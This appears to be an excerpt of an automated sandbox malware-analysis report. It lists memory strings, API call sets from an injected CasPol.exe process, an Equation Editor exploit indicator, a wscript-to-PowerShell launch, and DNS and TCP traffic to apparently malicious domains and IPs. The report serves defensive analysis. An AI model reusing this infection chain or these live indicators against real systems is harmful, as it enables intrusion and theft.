                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000013.00000002.514711440.0000000000250000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17a source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000013.00000002.514711440.0000000000250000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\Microsoft.Win32.TaskScheduler Rump\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,20_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,20_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,20_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00407877 FindFirstFileW,FindNextFileW,20_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0044E8F9 FindFirstFileExA,20_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,20_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,20_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_10006580 FindFirstFileExA,20_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0040AE51 FindFirstFileW,FindNextFileW,22_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,20_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                  Software Vulnerabilities

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: global trafficDNS query: name: u4u.kids
                  Source: global trafficDNS query: name: u4u.kids
                  Source: global trafficDNS query: name: u4u.kids
                  Source: global trafficDNS query: name: u4u.kids
                  Source: global trafficDNS query: name: u4u.kids
                  Source: global trafficDNS query: name: u4u.kids
                  Source: global trafficDNS query: name: u4u.kids
                  Source: global trafficDNS query: name: drive.google.com
                  Source: global trafficDNS query: name: drive.usercontent.google.com
                  Source: global trafficDNS query: name: servemail.exprotedsteel.pro
                  Source: global trafficDNS query: name: geoplugin.net
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 85.215.206.82:80
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 178.237.33.50:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
